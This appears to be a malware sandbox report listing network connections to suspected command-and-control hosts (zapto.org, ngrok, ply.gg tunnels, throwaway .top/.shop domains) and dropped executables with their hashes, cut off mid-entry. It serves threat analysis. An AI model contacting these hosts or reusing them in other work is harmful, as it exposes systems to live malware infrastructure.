US 66.254.114.171:443 a.adtng.com tcp
US 216.239.34.36:443 region1.google-analytics.com tcp
US 8.8.8.8:53 ht-cdn2.adtng.com udp
GB 64.210.156.16:443 ht-cdn2.adtng.com tcp
GB 64.210.156.16:443 ht-cdn2.adtng.com tcp
GB 64.210.156.16:443 ht-cdn2.adtng.com tcp
RU 185.215.113.209:80 185.215.113.209 tcp
US 8.8.8.8:53 hw-cdn2.adtng.com udp
GB 64.210.156.0:443 hw-cdn2.adtng.com tcp
YE 134.35.128.189:40500 udp
US 8.8.8.8:53 171.114.254.66.in-addr.arpa udp
US 8.8.8.8:53 36.34.239.216.in-addr.arpa udp
US 8.8.8.8:53 16.156.210.64.in-addr.arpa udp
US 8.8.8.8:53 0.156.210.64.in-addr.arpa udp
US 8.8.8.8:53 189.128.35.134.in-addr.arpa udp
US 8.8.8.8:53 storage.googleapis.com udp
FR 142.250.74.251:443 storage.googleapis.com tcp
US 8.8.8.8:53 251.74.250.142.in-addr.arpa udp
NL 149.154.167.99:443 t.me tcp
GB 104.123.95.227:443 steamcommunity.com tcp
FI 95.217.25.228:443 tcp
US 8.8.8.8:53 fivexc5pt.top udp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 camp.zapto.org udp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 20.83.148.22:80 tcp
RU 185.215.113.67:15206 tcp
US 216.239.34.36:443 region1.google-analytics.com udp
KZ 95.59.234.182:40500 udp
US 20.83.148.22:80 tcp
US 8.8.8.8:53 182.234.59.95.in-addr.arpa udp
US 192.210.150.26:8787 tcp
US 20.83.148.22:80 tcp
US 8.8.8.8:53 fivexc5pt.top udp
US 8.8.8.8:53 safe.ywxww.net udp
IR 95.81.102.72:40500 udp
US 8.8.8.8:53 72.102.81.95.in-addr.arpa udp
CN 60.191.236.246:820 safe.ywxww.net tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 192.210.150.26:8787 tcp
PL 45.80.158.31:80 tcp
US 8.8.8.8:53 fivexc5pt.top udp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
UZ 90.156.164.103:40500 udp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 103.164.156.90.in-addr.arpa udp
SE 193.233.255.106:69 tcp
RU 185.215.113.67:21405 tcp
PK 182.188.65.58:40500 tcp
US 147.185.221.17:30620 exchange-reasonably.gl.at.ply.gg tcp
US 20.83.148.22:80 tcp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 fivexc5pt.top udp
MX 189.141.139.39:40500 udp
US 8.8.8.8:53 39.139.141.189.in-addr.arpa udp
VN 14.243.221.170:2654 tcp
SE 151.177.61.79:4782 tcp
US 20.83.148.22:80 tcp
GB 38.180.203.11:1010 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 192.210.150.26:8787 tcp
NL 149.154.167.99:443 t.me tcp
US 20.83.148.22:80 tcp
UZ 90.156.160.56:40500 udp
US 8.8.8.8:53 56.160.156.90.in-addr.arpa udp
US 8.8.8.8:53 fivexc5pt.top udp
US 192.210.150.26:8787 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
UZ 92.38.19.10:40500 udp
US 8.8.8.8:53 10.19.38.92.in-addr.arpa udp
RU 185.215.113.67:15206 tcp
US 8.8.8.8:53 fivexc5pt.top udp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 t.0000o.xyz udp
US 199.195.251.23:88 t.0000o.xyz tcp
US 8.8.8.8:53 23.251.195.199.in-addr.arpa udp
US 8.8.8.8:53 aefieiaehfiaehr.top udp
RU 185.215.113.66:80 aefieiaehfiaehr.top tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 20.83.148.22:80 tcp
US 192.210.150.26:8787 tcp
SE 151.177.61.79:4782 tcp
VN 14.243.221.170:2654 tcp
SY 82.137.239.235:40500 tcp
US 147.185.221.17:30620 exchange-reasonably.gl.at.ply.gg tcp
AO 102.215.170.62:40500 udp
US 20.83.148.22:80 tcp
US 8.8.8.8:53 fivexc5pt.top udp
US 8.8.8.8:53 62.170.215.102.in-addr.arpa udp
TR 163.5.242.208:80 163.5.242.208 tcp
GB 38.180.203.11:1010 tcp
RU 185.215.113.67:21405 tcp
US 192.210.150.26:8787 tcp
SE 193.233.255.106:69 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
UZ 213.230.99.119:40500 udp
US 8.8.8.8:53 fivexc5pt.top udp
PL 45.80.158.31:80 tcp
RU 188.119.66.185:443 tcp
US 8.8.8.8:53 208.242.5.163.in-addr.arpa udp
US 8.8.8.8:53 119.99.230.213.in-addr.arpa udp
US 8.8.8.8:53 185.66.119.188.in-addr.arpa udp
US 20.83.148.22:80 tcp
US 8.8.8.8:53 233.38.18.104.in-addr.arpa udp
US 8.8.8.8:53 fivexc5sr.top udp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 fivexc5pt.top udp
US 8.8.8.8:53 23.149.64.172.in-addr.arpa udp
IR 185.80.102.252:40500 udp
NL 31.214.157.206:2024 tcp
US 8.8.8.8:53 252.102.80.185.in-addr.arpa udp
US 8.8.8.8:53 206.157.214.31.in-addr.arpa udp
US 20.83.148.22:80 tcp
US 8.8.8.8:53 camp.zapto.org udp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 fivexc5sr.top udp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
AO 154.71.224.9:40500 udp
RU 185.215.113.67:15206 tcp
US 8.8.8.8:53 9.224.71.154.in-addr.arpa udp
US 8.8.8.8:53 fivexc5pt.top udp
US 192.210.150.26:8787 tcp
US 20.83.148.22:80 tcp
US 8.8.8.8:53 fivexc5sr.top udp
US 20.83.148.22:80 tcp
IR 93.118.127.143:40500 udp
VN 14.243.221.170:2654 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 143.127.118.93.in-addr.arpa udp
US 8.8.8.8:53 fivexc5pt.top udp
US 20.83.148.22:80 tcp
US 8.8.8.8:53 fivexc5sr.top udp
US 192.210.150.26:8787 tcp
RU 31.8.228.20:40500 udp
US 8.8.8.8:53 20.228.8.31.in-addr.arpa udp
US 8.8.8.8:53 fivexc5pt.top udp
US 147.185.221.17:30620 exchange-reasonably.gl.at.ply.gg tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 192.210.150.26:8787 tcp
SE 151.177.61.79:4782 tcp
IR 2.176.92.74:40500 tcp
IR 2.179.117.33:40500 udp
US 8.8.8.8:53 fivexc5sr.top udp
SE 193.233.255.106:69 tcp
US 8.8.8.8:53 33.117.179.2.in-addr.arpa udp
US 8.8.8.8:53 aquafusion.com.co udp
CO 190.90.160.170:443 aquafusion.com.co tcp
RU 185.215.113.67:21405 tcp
NL 149.154.167.99:443 t.me tcp
GB 104.123.95.227:443 steamcommunity.com tcp
PL 45.80.158.31:80 tcp
US 192.210.150.26:8787 tcp
US 20.83.148.22:80 tcp
US 8.8.8.8:53 fivexc5pt.top udp
FI 95.217.25.228:443 tcp
TR 163.5.242.208:80 163.5.242.208 tcp
TR 163.5.242.208:80 163.5.242.208 tcp
UZ 62.209.135.143:40500 udp
US 20.83.148.22:80 tcp
GB 38.180.203.11:1010 tcp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 143.135.209.62.in-addr.arpa udp
US 8.8.8.8:53 fivexc5sr.top udp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 8.8.8.8:53 fivexc5pt.top udp
US 20.83.148.22:80 tcp
US 192.210.150.26:8787 tcp
RU 212.3.146.135:40500 udp
US 8.8.8.8:53 fivexc5sr.top udp
US 8.8.8.8:53 135.146.3.212.in-addr.arpa udp
RU 185.215.113.67:15206 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 192.210.150.26:8787 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 8.8.8.8:53 fivexc5pt.top udp
VN 14.243.221.170:2654 tcp
US 192.210.150.26:8787 tcp
US 20.83.148.22:80 tcp
US 8.8.8.8:53 fivexc5sr.top udp
IN 59.91.192.115:40500 udp
US 147.185.221.17:30620 exchange-reasonably.gl.at.ply.gg tcp
US 8.8.8.8:53 fivexc5pt.top udp
US 8.8.8.8:53 115.192.91.59.in-addr.arpa udp
US 192.210.150.26:8787 tcp
US 20.83.148.22:80 tcp
US 8.8.8.8:53 fivexc5sr.top udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 20.83.148.22:80 tcp
RU 31.41.244.12:80 31.41.244.12 tcp
NL 62.60.217.159:15666 tcp
SE 151.177.61.79:4782 tcp
US 8.8.8.8:53 12.244.41.31.in-addr.arpa udp
US 8.8.8.8:53 fivexc5pt.top udp
NL 149.154.167.99:443 t.me tcp
US 192.210.150.26:8787 tcp
KZ 31.171.187.236:40500 udp
GB 104.123.95.227:443 steamcommunity.com tcp
FI 95.217.25.228:443 tcp
US 8.8.8.8:53 236.187.171.31.in-addr.arpa udp
YE 46.35.80.190:40500 tcp
US 20.83.148.22:80 tcp
RU 185.215.113.67:21405 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 8.8.8.8:53 fivexc5sr.top udp
PL 45.80.158.31:80 tcp
BG 87.120.125.214:443 tcp
US 192.210.150.26:8787 tcp
US 20.83.148.22:80 tcp
RU 185.215.113.16:80 185.215.113.16 tcp
IR 2.189.31.47:40500 udp
GB 38.180.203.11:1010 tcp
US 8.8.8.8:53 47.31.189.2.in-addr.arpa udp
SE 193.233.255.106:69 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
RU 185.215.113.66:80 aefieiaehfiaehr.top tcp
BG 87.120.125.214:443 tcp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 fivexc5pt.top udp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 8.8.8.8:53 fivexc5sr.top udp
KZ 82.200.228.118:40500 udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:80 github.com tcp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 aeufoeahfouefhg.top udp
US 8.8.8.8:53 118.228.200.82.in-addr.arpa udp
US 147.185.221.23:1121 tcp
RU 185.215.113.66:80 aeufoeahfouefhg.top tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 192.210.150.26:8787 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
US 8.8.8.8:53 racedsuitreow.shop udp
US 8.8.8.8:53 pirati.privatedns.org udp
US 8.8.8.8:53 defenddsouneuw.shop udp
IT 87.6.220.118:80 pirati.privatedns.org tcp
US 8.8.8.8:53 fivexc5pt.top udp
US 8.8.8.8:53 deallyharvenw.shop udp
US 8.8.8.8:53 priooozekw.shop udp
US 8.8.8.8:53 22.249.124.192.in-addr.arpa udp
US 8.8.8.8:53 pumpkinkwquo.shop udp
US 8.8.8.8:53 abortinoiwiam.shop udp
RU 185.215.113.67:15206 tcp
US 8.8.8.8:53 surroundeocw.shop udp
US 8.8.8.8:53 118.220.6.87.in-addr.arpa udp
US 8.8.8.8:53 covvercilverow.shop udp
VN 14.243.221.170:2654 tcp
US 8.8.8.8:53 steamcommunity.com udp
FR 23.217.238.254:443 steamcommunity.com tcp
US 8.8.8.8:53 254.238.217.23.in-addr.arpa udp
UZ 90.156.160.66:40500 udp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 66.160.156.90.in-addr.arpa udp
US 8.8.8.8:53 fivexc5sr.top udp
US 20.83.148.22:80 tcp
BG 87.120.125.214:443 tcp
RU 188.119.66.185:443 tcp
US 8.8.8.8:53 0.tcp.eu.ngrok.io udp
DE 18.192.31.30:15174 0.tcp.eu.ngrok.io tcp
US 8.8.8.8:53 camp.zapto.org udp
CA 158.69.12.143:7771 camp.zapto.org tcp
NL 31.214.157.206:2024 tcp
US 8.8.8.8:53 30.31.192.18.in-addr.arpa udp
US 147.185.221.17:30620 exchange-reasonably.gl.at.ply.gg tcp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 fivexc5pt.top udp
US 8.8.8.8:53 api.ipify.org udp
KZ 37.151.156.118:40500 udp
US 104.26.12.205:443 api.ipify.org tcp
US 20.83.148.22:80 tcp
US 8.8.8.8:53 c.pki.goog udp
US 8.8.8.8:53 118.156.151.37.in-addr.arpa udp
US 8.8.8.8:53 205.12.26.104.in-addr.arpa udp
FR 142.250.179.67:80 c.pki.goog tcp
US 8.8.8.8:53 67.179.250.142.in-addr.arpa udp
NL 149.154.167.99:443 t.me tcp
DE 18.192.31.30:15174 0.tcp.eu.ngrok.io tcp
SE 151.177.61.79:4782 tcp
GB 104.123.95.227:443 steamcommunity.com tcp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 fivexc5sr.top udp
FI 95.217.25.228:443 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
IR 151.247.143.25:40500 udp
US 8.8.8.8:53 fivexc5pt.top udp
US 8.8.8.8:53 25.143.247.151.in-addr.arpa udp
US 192.210.150.26:8787 tcp
BG 87.120.125.214:443 tcp
DE 18.192.31.30:15174 0.tcp.eu.ngrok.io tcp
US 20.83.148.22:80 tcp
US 8.8.8.8:53 fivexc5sr.top udp
UZ 83.222.7.85:40500 tcp
US 20.83.148.22:80 tcp
RU 185.215.113.67:21405 tcp
UZ 87.237.234.159:40500 udp
BG 87.120.125.214:443 tcp
US 8.8.8.8:53 fivexc5pt.top udp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 159.234.237.87.in-addr.arpa udp
CA 158.69.12.143:7771 camp.zapto.org tcp
PL 45.80.158.31:80 tcp
US 8.8.8.8:53 fivexc5sr.top udp
US 20.83.148.22:80 tcp
DE 18.192.31.30:15174 0.tcp.eu.ngrok.io tcp
SE 193.233.255.106:69 tcp
US 192.210.150.26:8787 tcp
RU 92.244.232.104:40500 udp
US 8.8.8.8:53 104.232.244.92.in-addr.arpa udp
US 20.83.148.22:80 tcp
GB 38.180.203.11:1010 tcp
US 8.8.8.8:53 fivexc5pt.top udp
US 20.83.148.22:80 tcp
DE 18.192.31.30:15174 0.tcp.eu.ngrok.io tcp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 fivexc5sr.top udp
VN 14.243.221.170:2654 tcp
RU 185.215.113.67:15206 tcp
US 8.8.8.8:53 ikswccmqsqeswegi.xyz udp
US 8.8.8.8:53 aukuqiksseyscgie.xyz udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 147.185.221.17:30620 exchange-reasonably.gl.at.ply.gg tcp
US 20.83.148.22:80 tcp
US 8.8.8.8:53 124.191.200.185.in-addr.arpa udp
US 192.210.150.26:8787 tcp
DE 18.192.31.30:15174 0.tcp.eu.ngrok.io tcp
US 8.8.8.8:53 fivexc5pt.top udp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 20.83.148.22:80 tcp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 fivexc5sr.top udp
YE 134.35.126.112:40500 udp
RU 185.215.113.36:80 185.215.113.36 tcp
US 8.8.8.8:53 112.126.35.134.in-addr.arpa udp
US 192.210.150.26:8787 tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
SE 151.177.61.79:4782 tcp
DE 18.192.31.30:15174 0.tcp.eu.ngrok.io tcp
US 8.8.8.8:53 ikswccmqsqeswegi.xyz udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 8.8.8.8:53 fivexc5sr.top udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 8.8.8.8:53 fivexc5pt.top udp
US 192.210.150.26:8787 tcp
IR 2.176.109.1:40500 udp
US 8.8.8.8:53 1.109.176.2.in-addr.arpa udp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 20.83.148.22:80 tcp
US 20.83.148.22:80 tcp
PL 45.80.158.31:80 tcp
DE 18.192.31.30:15174 0.tcp.eu.ngrok.io tcp
US 192.210.150.26:8787 tcp
YE 134.35.128.189:40500 tcp
US 8.8.8.8:53 fivexc5pt.top udp
RU 185.215.113.67:21405 tcp
IR 5.236.121.2:40500 udp

Files

memory/228-0-0x0000000074ECE000-0x0000000074ECF000-memory.dmp

memory/228-1-0x0000000000A00000-0x0000000000A08000-memory.dmp

memory/228-2-0x00000000053F0000-0x000000000548C000-memory.dmp

memory/228-3-0x0000000074EC0000-0x0000000075670000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\Registry.exe

MD5 6f154cc5f643cc4228adf17d1ff32d42
SHA1 10efef62da024189beb4cd451d3429439729675b
SHA256 bf901de5b54a593b3d90a2bcfdf0a963ba52381f542bf33299bdfcc3b5b2afff
SHA512 050fc8a9a852d87f22296be8fe4067d6fabefc2dec408da3684a0deb31983617e8ba42494d3dbe75207d0810dec7ae1238b17b23ed71668cc099a31e1f6539d1

memory/2456-15-0x00007FFD30E43000-0x00007FFD30E45000-memory.dmp

memory/2456-16-0x0000000000470000-0x0000000000794000-memory.dmp

memory/2456-17-0x00007FFD30E40000-0x00007FFD31901000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\02.08.2022.exe

MD5 30d1eeefad17c88e2eabe2bf8062a72d
SHA1 e4938bb238fae762bb2d6c18093df07536be918e
SHA256 7e5f9788995f6500e751aabfa04bcc4247dfee979124a1fae621326982a72af8
SHA512 2f0740cc007e354cd01d82ee93189575279fe0e192eec87c115fb9de2a9f272178785b7769484e08ffd43c2dc10eb770ebc5edaa53d40b8f69668cdf166918fb

memory/2456-32-0x00007FFD30E40000-0x00007FFD31901000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe

MD5 4cbc3c777f08cfbd14fc1ead80a5dd50
SHA1 dc94c1792a3ca2531dde570f9142c82c6336fadb
SHA256 115eb84390be11a5cbd396a9b950fcbe799e1684d0a6995ada7bca184fffba8f
SHA512 dee450b527956f9f22034984afdfd4c8c2a3e9933ad847c48bbe1873113b299814900137c98e8e25875230a649e8c46a77b5505729b3cd785c69b1df161a62b1

memory/4852-45-0x000000001C7C0000-0x000000001C810000-memory.dmp

memory/4852-46-0x000000001C8D0000-0x000000001C982000-memory.dmp

memory/228-47-0x0000000074ECE000-0x0000000074ECF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\chrome11.exe

MD5 5b39766f490f17925defaee5de2f9861
SHA1 9c89f2951c255117eb3eebcd61dbecf019a4c186
SHA256 de615656d7f80b5e01bc6a604a780245ca0ccefd920a6e2f1439bf27c02b7b7a
SHA512 d216fa45c98e423f15c2b52f980fc1c439d365b9799e5063e6b09837b419d197ba68d52ea7facf469eae38e531f17bd19eaf25d170465dc41217ca6ab9eb30bf

C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe

MD5 71b3810a22e1b51e8b88cd63b5e23ba0
SHA1 7ac4ab80301dcabcc97ec68093ed775d148946de
SHA256 57bf3ab110dc44c56ed5a53b02b8c9ccc24054cf9c9a5aacc72f71a992138a3f
SHA512 85ddc05305902ed668981b2c33bab16f8e5a5d9db9ff1cee4d4a06c917075e7d59776bebfb3a3128ec4432db63f07c593af6f4907a5b75c9027f1bc9538612e8

memory/228-65-0x0000000074EC0000-0x0000000075670000-memory.dmp

memory/4312-68-0x00000250D3E70000-0x00000250D4300000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\award.pdf.exe

MD5 90d46387c86a7983ff0ef204c335060a
SHA1 2176e87fa4a005dd94cca750a344625e0c0fdfb0
SHA256 e463e04623e7348c515e0cc29320ff4e282c360a93b7a51f696639bd96a8bfb8
SHA512 654768e8a185ae338f255ecc3e512f6b89a984c44807c9153b17c4e4a7cc6b796536c563b1823ed84fbc20414f7a5ead7e9296d1f6cd03aa52b293075e9fcb7b

memory/4312-83-0x00000250EEB80000-0x00000250EED42000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TmpE0AB.tmp

MD5 e4df78e5f6f81c5cc4de27b3aaf534a9
SHA1 47783b9211f8f657cd626ba1f842de361a2c88df
SHA256 83355ae6fdc4061ba74a34e82764623843b5659dbf6983ccc0deb846f52cb50d
SHA512 2c915c84f4e0dae2d8456bc03da8d19132f72d75e4aec1396e4e80edbbf3c191bd364afdda81a79bd0d7c2d54b1d6ba3267a14721699126d9f35388963f46ea1

C:\Users\Admin\AppData\Local\Temp\tmpE0EC.tmp

MD5 ba33d952d889399e6517b14767301890
SHA1 86971110b6ce7024809dc0ed1030c23c5512f921
SHA256 7f48dd0b2c4f9b7b2737dfb2e880144d44d9b97e9e29e68c2dec38de926a1657
SHA512 f7ccace1d2a119d6213fdc7b273f3bcb3bfdfff0b863d033834b9bdff809fab6a4a68ff004e535f0ecc684ad8b1f3d5c5b72b12b17b38e5b7834805d46b6237c

C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys\84ef8e32cf3dd22e15e36759d999f0aa_cca0d105-8260-4611-8c12-bd85a7208b9f

MD5 0158fe9cead91d1b027b795984737614
SHA1 b41a11f909a7bdf1115088790a5680ac4e23031b
SHA256 513257326e783a862909a2a0f0941d6ff899c403e104fbd1dbc10443c41d9f9a
SHA512 c48a55cc7a92cefcefe5fb2382ccd8ef651fc8e0885e88a256cd2f5d83b824b7d910f755180b29eccb54d9361d6af82f9cc741bd7e6752122949b657da973676

C:\Users\Admin\AppData\Local\Temp\Files\test14.exe

MD5 f299d1d0700fc944d8db8e69beb06ddd
SHA1 902814ffd67308ba74d89b9cbb08716eec823ead
SHA256 b105f79e0eac7079fc2998949eee28fb0bf7f9a08c4912477031ac8d7e897406
SHA512 6821e6e9393cbd8471a0403052ac4d4df6e14dc0955deabd7709331dcf537f3076c08003001eab34788d53cf03fd61878a4b31aa7879f862627b28110f43e2ca

C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\D1A239B84C36C13862296195F1624FBD92295D3B

MD5 1c8213d032175ba4d71181f1c31ddab5
SHA1 f5519bdc4e45d4890b1e3e1638f2411066386c9d
SHA256 6fc69b79d68e1c61a561e22716ac1ec08f47bd0ee09fc70af2a73f99a495b3ce
SHA512 c9fc993f20e4a502baa22914c7d256b1fe7f1a01273bd71aff35efb148f4f780c3bc298bdf8507c5b04e645f4dc300576bb1d85a4cbe41c96b555bffe59bd2c3

memory/4560-138-0x0000000000180000-0x00000000001D4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe

MD5 91b5e8f0f941632476acdb56dd13c598
SHA1 34a051be4b40fa273deb322d3f6827138068e800
SHA256 1a7d261601e4bbc160e9b96db9320d6594665aa94a8827b2e749beadd89b7590
SHA512 7a10c304d120c71cd3b5b7e97414b3b8feb4aafc6a05a4e7d0914e1f69fdd9f717e36d063e8f0adc3d4192af69743e0c9778569bdcf8883d167f6fcb151cd3c6

memory/2180-150-0x0000000000930000-0x0000000000946000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\pp.exe

MD5 08dafe3bb2654c06ead4bb33fb793df8
SHA1 d1d93023f1085eed136c6d225d998abf2d5a5bf0
SHA256 fc16c0bf09002c93723b8ab13595db5845a50a1b6a133237ac2d148b0bb41700
SHA512 9cf2bd749a9ee6e093979bc0d3aacfba03ad6469c98ff3ef35ce5d1635a052e4068ac50431626f6ba8649361802f7fb2ffffb2b325e2795c54b7014180559c99

C:\Users\Admin\AppData\Local\Temp\Files\305iz8bs.exe

MD5 5fa4c8f61672a4cc9dd6a58e767d36fe
SHA1 ff0a211e3f6e7ad3abe3bdfb87daafa1c273def7
SHA256 fee35ed8a4d3b5a23b8fe7c153f3db5950a7d3f02b06bd0e2db149889717143f
SHA512 c0dd84684fba2a40e68193dbd1f0f7f57ff52cab092ca01cadd2f68c2fc53de8905278e8c2c3ec00ee68e5e6624c563d7f194f1403a4ec6e7bc7e94068a27ac9

memory/2532-170-0x00000237B1870000-0x00000237B1926000-memory.dmp

memory/2532-171-0x00000237CBE10000-0x00000237CBF1A000-memory.dmp

memory/2532-199-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-207-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-215-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-233-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-231-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-225-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-223-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-221-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-219-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-217-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-213-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-211-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-209-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-229-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-227-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-205-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-203-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-201-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-197-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-196-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-193-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-191-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-189-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-187-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-183-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-181-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-180-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-177-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-175-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-173-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-172-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

memory/2532-185-0x00000237CBE10000-0x00000237CBF16000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2910514938.exe

MD5 0c883b1d66afce606d9830f48d69d74b
SHA1 fe431fe73a4749722496f19b3b3ca0b629b50131
SHA256 d921fc993574c8be76553bcf4296d2851e48ee39b958205e69bdfd7cf661d2b1
SHA512 c047452a23efad4262479fbfeb5e23f9497d7cefd4cbb58e869801206669c2a0759698c70d18050316798d5d939b989537fdce3842aa742449f5e08ed7fa60a5

memory/2532-4196-0x00000237B3490000-0x00000237B34DC000-memory.dmp

memory/2532-4195-0x00000237B36D0000-0x00000237B3726000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\Amadeus.exe

MD5 36a627b26fae167e6009b4950ff15805
SHA1 f3cb255ab3a524ee05c8bab7b4c01c202906b801
SHA256 a2389de50f83a11d6fe99639fc5c644f6d4dcea6834ecbf90a4ead3d5f36274a
SHA512 2133aba3e2a41475b2694c23a9532c238abab0cbae7771de83f9d14a8b2c0905d44b1ba0b1f7aae501052f4eba0b6c74018d66c3cbc8e8e3443158438a621094

C:\Users\Admin\AppData\Local\Temp\1989129625.exe

MD5 cb8420e681f68db1bad5ed24e7b22114
SHA1 416fc65d538d3622f5ca71c667a11df88a927c31
SHA256 5850892f67f85991b31fc90f62c8b7791afeb3c08ae1877d857aa2b59471a2ea
SHA512 baaabcc4ad5d409267a34ed7b20e4afb4d247974bfc581d39aae945e5bf8a673a1f8eacae2e6783480c8baaeb0a80d028274a202d456f13d0af956afa0110fdf

memory/5272-4216-0x00000000005C0000-0x00000000005C6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2309417675.exe

MD5 96509ab828867d81c1693b614b22f41d
SHA1 c5f82005dbda43cedd86708cc5fc3635a781a67e
SHA256 a9de2927b0ec45cf900508fec18531c04ee9fa8a5dfe2fc82c67d9458cf4b744
SHA512 ff603117a06da8fb2386c1d2049a5896774e41f34d05951ecd4e7b5fc9da51a373e3fcf61af3577ff78490cf898471ce8e71eae848a12812fe98cd7e76e1a9ca

C:\Users\Admin\AppData\Local\Temp\Files\build555.exe

MD5 4e18e7b1280ebf97a945e68cda93ce33
SHA1 602ab8bb769fff3079705bf2d3b545fc08d07ee6
SHA256 30b84843ed02b74dfd6c280aa14001a724490379e9e9e32f5f61a86f8e24976d
SHA512 9612654887bdd17edba4f238efd327d86e9f2cd0410d6c7f15a125dacfc98bf573f4a480db2a415f328a403240f1b9adc275a7e790fd8521c53724f1f8825f37

C:\Users\Admin\AppData\Local\Temp\Files\Complexo%20v4.exe

MD5 d9694a6a1989d79aeded3f93cb97d24e
SHA1 a18019b9793029dac4d10e619ec85ea26909336a
SHA256 772c7a131d2a7a239ec39f32214eb94113aacd3984f572fb7e3b1fa1bec98f8c
SHA512 35a29c81d72f0e0bdb169c400dc90bf85859313c250824bf1fbbe362903c63f6a826e94994f8d86e8f56def5ce34cc71a45c6ff936e85fcfe8d169dbdb118168

C:\Users\Admin\AppData\Local\Temp\Files\FDR9876567000.exe

MD5 c517ecc1d57af03affdd6945e1b618d8
SHA1 5c5174ebdf5902ada7c5899b6c0b98f2db363372
SHA256 9a32e0821da4466b858ecfd185f3d9bff232d8a3b44983988c248df05ef7c2ef
